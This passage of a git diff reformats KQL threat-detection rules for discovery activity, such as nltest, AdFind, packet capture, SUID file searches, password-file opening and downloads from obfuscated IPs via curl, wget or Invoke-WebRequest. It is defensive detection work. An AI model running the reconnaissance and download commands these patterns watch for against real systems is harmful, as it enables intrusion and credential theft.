ProcessCommandLine contains " 172.24." or ProcessCommandLine contains " 172.25." or ProcessCommandLine contains " 172.26." or ProcessCommandLine contains " 172.27." or ProcessCommandLine contains " 172.28." or ProcessCommandLine contains " 172.29." or ProcessCommandLine contains " 172.30." or ProcessCommandLine contains " 172.31." or ProcessCommandLine contains " 127." or ProcessCommandLine contains " 169.254.") and FolderPath endswith "/ping") \ No newline at end of file diff --git a/KQL/rules/Discovery/network_reconnaissance_activity.kql b/KQL/rules/Discovery/network_reconnaissance_activity.kql index 109e83da..b036cc04 100644 --- a/KQL/rules/Discovery/network_reconnaissance_activity.kql +++ b/KQL/rules/Discovery/network_reconnaissance_activity.kql @@ -1,12 +1,12 @@ -// Title: Network Reconnaissance Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-07 -// Level: high -// Description: Detects a set of suspicious network related commands often used in recon stages -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1087, attack.t1082, car.2016-03-001 -// False Positives: -// - False positives depend on scripts and administrative tools used in the monitored environment - -DeviceProcessEvents +// Title: Network Reconnaissance Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-07 +// Level: high +// Description: Detects a set of suspicious network related commands often used in recon stages +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087, attack.t1082, car.2016-03-001 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents | where ProcessCommandLine contains "nslookup" and ProcessCommandLine contains "_ldap._tcp.dc._msdcs." \ No newline at end of file diff --git a/KQL/rules/Discovery/network_sniffing_macos.kql b/KQL/rules/Discovery/network_sniffing_macos.kql index 5e3c4ee1..0bcd2c9c 100644 --- a/KQL/rules/Discovery/network_sniffing_macos.kql +++ b/KQL/rules/Discovery/network_sniffing_macos.kql @@ -1,13 +1,13 @@ -// Title: Network Sniffing - MacOs -// Author: Alejandro Ortuno, oscd.community -// Date: 2020-10-14 -// Level: informational -// Description: Detects the usage of tooling to sniff network traffic. -// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.credential-access, attack.t1040 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Network Sniffing - MacOs +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-14 +// Level: informational +// Description: Detects the usage of tooling to sniff network traffic. +// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1040 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where FolderPath endswith "/tcpdump" or FolderPath endswith "/tshark" \ No newline at end of file diff --git a/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql b/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql index 9903a25e..95fb2310 100644 --- a/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql +++ b/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql @@ -1,12 +1,12 @@ -// Title: New Network Trace Capture Started Via Netsh.EXE -// Author: Kutepov Anton, oscd.community -// Date: 2019-10-24 -// Level: medium -// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.credential-access, attack.t1040 -// False Positives: -// - Legitimate administration activity - -DeviceProcessEvents +// Title: New Network Trace Capture Started Via Netsh.EXE +// Author: Kutepov Anton, oscd.community +// Date: 2019-10-24 +// Level: medium +// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1040 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents | where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/nltest_exe_execution.kql b/KQL/rules/Discovery/nltest_exe_execution.kql index 30f4ef74..2f4f7e57 100644 --- a/KQL/rules/Discovery/nltest_exe_execution.kql +++ b/KQL/rules/Discovery/nltest_exe_execution.kql @@ -1,12 +1,12 @@ -// Title: Nltest.EXE Execution -// Author: Arun Chauhan -// Date: 2023-02-03 -// Level: low -// Description: Detects nltest commands that can be used for information discovery -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1016, attack.t1018, attack.t1482 -// False Positives: -// - Legitimate administration activity - -DeviceProcessEvents +// Title: Nltest.EXE Execution +// Author: Arun Chauhan +// Date: 2023-02-03 +// Level: low +// Description: Detects nltest commands that can be used for information discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016, attack.t1018, attack.t1482 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents | where FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/notepad_password_files_discovery.kql b/KQL/rules/Discovery/notepad_password_files_discovery.kql index 8d0e8b2b..ea16fd51 100644 --- a/KQL/rules/Discovery/notepad_password_files_discovery.kql +++ b/KQL/rules/Discovery/notepad_password_files_discovery.kql @@ -1,12 +1,12 @@ -// Title: Notepad Password Files Discovery -// Author: The DFIR Report -// Date: 2025-02-21 -// Level: low -// Description: Detects the execution of Notepad to open a file that has the string "password" which may indicate unauthorized access to credentials or suspicious activity. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 -// False Positives: -// - Legitimate use of opening files from remote hosts by administrators or users. However, storing passwords in text readable format could potentially be a violation of the organization's policy. Any match should be investigated further. - -DeviceProcessEvents +// Title: Notepad Password Files Discovery +// Author: The DFIR Report +// Date: 2025-02-21 +// Level: low +// Description: Detects the execution of Notepad to open a file that has the string "password" which may indicate unauthorized access to credentials or suspicious activity. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 +// False Positives: +// - Legitimate use of opening files from remote hosts by administrators or users. However, storing passwords in text readable format could potentially be a violation of the organization's policy. Any match should be investigated further. + +DeviceProcessEvents | where ((ProcessCommandLine contains "password" and ProcessCommandLine contains ".txt") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".csv") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".doc") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".xls")) and FolderPath endswith "\\notepad.exe" and InitiatingProcessFolderPath endswith "\\explorer.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/obfuscated_ip_download_activity.kql b/KQL/rules/Discovery/obfuscated_ip_download_activity.kql index 8ab99f01..0301a460 100644 --- a/KQL/rules/Discovery/obfuscated_ip_download_activity.kql +++ b/KQL/rules/Discovery/obfuscated_ip_download_activity.kql @@ -1,10 +1,10 @@ -// Title: Obfuscated IP Download Activity -// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2022-08-03 -// Level: medium -// Description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command -// MITRE Tactic: Discovery -// Tags: attack.discovery - -DeviceProcessEvents +// Title: Obfuscated IP Download Activity +// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2022-08-03 +// Level: medium +// Description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command +// MITRE Tactic: Discovery +// Tags: attack.discovery + +DeviceProcessEvents | where (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "irm " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}")) \ No newline at end of file diff --git a/KQL/rules/Discovery/obfuscated_ip_via_cli.kql b/KQL/rules/Discovery/obfuscated_ip_via_cli.kql index 17246363..f664129c 100644 --- a/KQL/rules/Discovery/obfuscated_ip_via_cli.kql +++ b/KQL/rules/Discovery/obfuscated_ip_via_cli.kql @@ -1,10 +1,10 @@ -// Title: Obfuscated IP Via CLI -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2022-08-03 -// Level: medium -// Description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line -// MITRE Tactic: Discovery -// Tags: attack.discovery - -DeviceProcessEvents +// Title: Obfuscated IP Via CLI +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2022-08-03 +// Level: medium +// Description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line +// MITRE Tactic: Discovery +// Tags: attack.discovery + +DeviceProcessEvents | where (FolderPath endswith "\\ping.exe" or FolderPath endswith "\\arp.exe") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}")) \ No newline at end of file diff --git a/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql b/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql index 752a9f90..b1f77a44 100644 --- a/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql +++ b/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql @@ -1,10 +1,10 @@ -// Title: OS Architecture Discovery Via Grep -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-06-02 -// Level: low -// Description: Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo" -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 - -DeviceProcessEvents +// Title: OS Architecture Discovery Via Grep +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: low +// Description: Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo" +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents | where (ProcessCommandLine endswith "aarch64" or ProcessCommandLine endswith "arm" or ProcessCommandLine endswith "i386" or ProcessCommandLine endswith "i686" or ProcessCommandLine endswith "mips" or ProcessCommandLine endswith "x86_64") and FolderPath endswith "/grep" \ No newline at end of file diff --git a/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql b/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql index 9d06690e..7ca0e464 100644 --- a/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql +++ b/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql @@ -1,12 +1,12 @@ -// Title: Permission Check Via Accesschk.EXE -// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-10-13 -// Level: medium -// Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1069.001 -// False Positives: -// - System administrator Usage - -DeviceProcessEvents +// Title: Permission Check Via Accesschk.EXE +// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-13 +// Level: medium +// Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1069.001 +// False Positives: +// - System administrator Usage + +DeviceProcessEvents | where (ProcessCommandLine contains "uwcqv " or ProcessCommandLine contains "kwsu " or ProcessCommandLine contains "qwsu " or ProcessCommandLine contains "uwdqs ") and (ProcessVersionInfoProductName endswith "AccessChk" or ProcessVersionInfoFileDescription contains "Reports effective permissions" or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe") or ProcessVersionInfoOriginalFileName =~ "accesschk.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/pktmon_exe_execution.kql b/KQL/rules/Discovery/pktmon_exe_execution.kql index 33b2823c..e4629826 100644 --- a/KQL/rules/Discovery/pktmon_exe_execution.kql +++ b/KQL/rules/Discovery/pktmon_exe_execution.kql @@ -1,12 +1,12 @@ -// Title: PktMon.EXE Execution -// Author: frack113 -// Date: 2022-03-17 -// Level: medium -// Description: Detects execution of PktMon, a tool that captures network packets. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.credential-access, attack.t1040 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: PktMon.EXE Execution +// Author: frack113 +// Date: 2022-03-17 +// Level: medium +// Description: Detects execution of PktMon, a tool that captures network packets. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1040 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where FolderPath endswith "\\pktmon.exe" or ProcessVersionInfoOriginalFileName =~ "PktMon.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql b/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql index 5b8b9489..28e31d44 100644 --- a/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql +++ b/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql @@ -1,11 +1,11 @@ -// Title: Pnscan Binary Data Transmission Activity -// Author: David Burkett (@signalblur) -// Date: 2024-04-16 -// Level: medium -// Description: Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. -// This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1046 - -DeviceProcessEvents +// Title: Pnscan Binary Data Transmission Activity +// Author: David Burkett (@signalblur) +// Date: 2024-04-16 +// Level: medium +// Description: Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. +// This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 + +DeviceProcessEvents | where ProcessCommandLine matches regex "-(W|R)\\s?(\\s|"|')([0-9a-fA-F]{2}\\s?){2,20}(\\s|"|')" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql b/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql index 1e81ff0c..ce8d5c18 100644 --- a/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql +++ b/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Configuration And Service Reconnaissance Via Reg.EXE -// Author: Timur Zinniatullin, oscd.community -// Date: 2019-10-21 -// Level: medium -// Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1012, attack.t1007 -// False Positives: -// - Discord - -DeviceProcessEvents +// Title: Potential Configuration And Service Reconnaissance Via Reg.EXE +// Author: Timur Zinniatullin, oscd.community +// Date: 2019-10-21 +// Level: medium +// Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1012, attack.t1007 +// False Positives: +// - Discord + +DeviceProcessEvents | where ProcessCommandLine contains "query" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "currentVersion\\windows" or ProcessCommandLine contains "winlogon\\" or ProcessCommandLine contains "currentVersion\\shellServiceObjectDelayLoad" or ProcessCommandLine contains "currentVersion\\run" or ProcessCommandLine contains "currentVersion\\policies\\explorer\\run" or ProcessCommandLine contains "currentcontrolset\\services") \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql b/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql index edd00674..108b5468 100644 --- a/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql +++ b/KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql @@ -1,13 +1,13 @@ -// Title: Potential Container Discovery Via Inodes Listing -// Author: Seth Hanford -// Date: 2023-08-23 -// Level: low -// Description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 -// False Positives: -// - Legitimate system administrator usage of these commands -// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered - -DeviceProcessEvents +// Title: Potential Container Discovery Via Inodes Listing +// Author: Seth Hanford +// Date: 2023-08-23 +// Level: low +// Description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Legitimate system administrator usage of these commands +// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered + +DeviceProcessEvents | where ((ProcessCommandLine contains " -" and ProcessCommandLine contains "i") and (ProcessCommandLine contains " -" and ProcessCommandLine contains "d")) and ProcessCommandLine endswith " /" and FolderPath endswith "/ls" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql b/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql index abd1bb78..7603ebc3 100644 --- a/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql +++ b/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql @@ -1,10 +1,10 @@ -// Title: Potential Discovery Activity Using Find - Linux -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-28 -// Level: medium -// Description: Detects usage of "find" binary in a suspicious manner to perform discovery -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 - -DeviceProcessEvents +// Title: Potential Discovery Activity Using Find - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-28 +// Level: medium +// Description: Detects usage of "find" binary in a suspicious manner to perform discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents | where (ProcessCommandLine contains "-perm -4000" or ProcessCommandLine contains "-perm -2000" or ProcessCommandLine contains "-perm 0777" or ProcessCommandLine contains "-perm -222" or ProcessCommandLine contains "-perm -o w" or ProcessCommandLine contains "-perm -o x" or ProcessCommandLine contains "-perm -u=s" or ProcessCommandLine contains "-perm -g=s") and FolderPath endswith "/find" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql b/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql index 37b07f74..79eb20d4 100644 --- a/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql +++ b/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql @@ -1,10 +1,10 @@ -// Title: Potential Discovery Activity Using Find - MacOS -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-28 -// Level: medium -// Description: Detects usage of "find" binary in a suspicious manner to perform discovery -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1083 - -DeviceProcessEvents +// Title: Potential Discovery Activity Using Find - MacOS +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-28 +// Level: medium +// Description: Detects usage of "find" binary in a suspicious manner to perform discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents | where (ProcessCommandLine contains "-perm -4000" or ProcessCommandLine contains "-perm -2000" or ProcessCommandLine contains "-perm 0777" or ProcessCommandLine contains "-perm -222" or ProcessCommandLine contains "-perm -o w" or ProcessCommandLine contains "-perm -o x" or ProcessCommandLine contains "-perm -u=s" or ProcessCommandLine contains "-perm -g=s") and FolderPath endswith "/find" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql b/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql index 7f254cfd..ed4a9c0d 100644 --- a/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql +++ b/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Discovery Activity Via Dnscmd.EXE -// Author: @gott_cyber -// Date: 2022-07-31 -// Level: medium -// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.execution -// False Positives: -// - Legitimate administration use - -DeviceProcessEvents +// Title: Potential Discovery Activity Via Dnscmd.EXE +// Author: @gott_cyber +// Date: 2022-07-31 +// Level: medium +// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution +// False Positives: +// - Legitimate administration use + +DeviceProcessEvents | where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql b/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql index 56d503e2..6e9c3014 100644 --- a/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql +++ b/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql @@ -1,10 +1,10 @@ -// Title: Potential GobRAT File Discovery Via Grep -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-06-02 -// Level: high -// Description: Detects the use of grep to discover specific files created by the GobRAT malware -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082 - -DeviceProcessEvents +// Title: Potential GobRAT File Discovery Via Grep +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: high +// Description: Detects the use of grep to discover specific files created by the GobRAT malware +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents | where (ProcessCommandLine contains "apached" or ProcessCommandLine contains "frpc" or ProcessCommandLine contains "sshd.sh" or ProcessCommandLine contains "zone.arm") and FolderPath endswith "/grep" \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql b/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql index 803abea3..d1a830fd 100644 --- a/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql +++ b/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Recon Activity Using DriverQuery.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-19 -// Level: high -// Description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers -// MITRE Tactic: Discovery -// Tags: attack.discovery -// False Positives: -// - Legitimate usage by some scripts might trigger this as well - -DeviceProcessEvents +// Title: Potential Recon Activity Using DriverQuery.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-19 +// Level: high +// Description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers +// MITRE Tactic: Discovery +// Tags: attack.discovery +// False Positives: +// - Legitimate usage by some scripts might trigger this as well + +DeviceProcessEvents | where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql b/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql index 48cc0519..357f8e77 100644 --- a/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql +++ b/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Recon Activity Via Nltest.EXE -// Author: Craig Young, oscd.community, Georg Lauenstein -// Date: 2021-07-24 -// Level: medium -// Description: Detects nltest commands that can be used for information discovery -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1016, attack.t1482 -// False Positives: -// - Legitimate administration use but user and host must be investigated - -DeviceProcessEvents +// Title: Potential Recon Activity Via Nltest.EXE +// Author: Craig Young, oscd.community, Georg Lauenstein +// Date: 2021-07-24 +// Level: medium +// Description: Detects nltest commands that can be used for information discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016, attack.t1482 +// False Positives: +// - Legitimate administration use but user and host must be investigated + +DeviceProcessEvents | where (FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe") and ((ProcessCommandLine contains "server" and ProcessCommandLine contains "query") or (ProcessCommandLine contains "/user" or ProcessCommandLine contains "all_trusts" or ProcessCommandLine contains "dclist:" or ProcessCommandLine contains "dnsgetdc:" or ProcessCommandLine contains "domain_trusts" or ProcessCommandLine contains "dsgetdc:" or ProcessCommandLine contains "parentdomain" or ProcessCommandLine contains "trusted_domains")) \ No newline at end of file diff --git a/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql index afcfebbf..dd870502 100644 --- a/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql +++ b/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql @@ -1,12 +1,12 @@ -// Title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS -// Author: blueteamer8699 -// Date: 2022-01-03 -// Level: medium -// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005 -// False Positives: -// - Administrative activity - -DeviceProcessEvents +// Title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS +// Author: blueteamer8699 +// Date: 2022-01-03 +// Level: medium +// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005 +// False Positives: +// - Administrative activity + +DeviceProcessEvents | where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql b/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql index 7f46bb95..5ba453f0 100644 --- a/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql +++ b/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - AdFind Suspicious Execution -// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community -// Date: 2021-02-02 -// Level: high -// Description: Detects AdFind execution with common flags seen used during attacks -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u -// False Positives: -// - Legitimate admin activity - -DeviceProcessEvents +// Title: PUA - AdFind Suspicious Execution +// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community +// Date: 2021-02-02 +// Level: high +// Description: Detects AdFind execution with common flags seen used during attacks +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u +// False Positives: +// - Legitimate admin activity + +DeviceProcessEvents | where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains " dclist " or 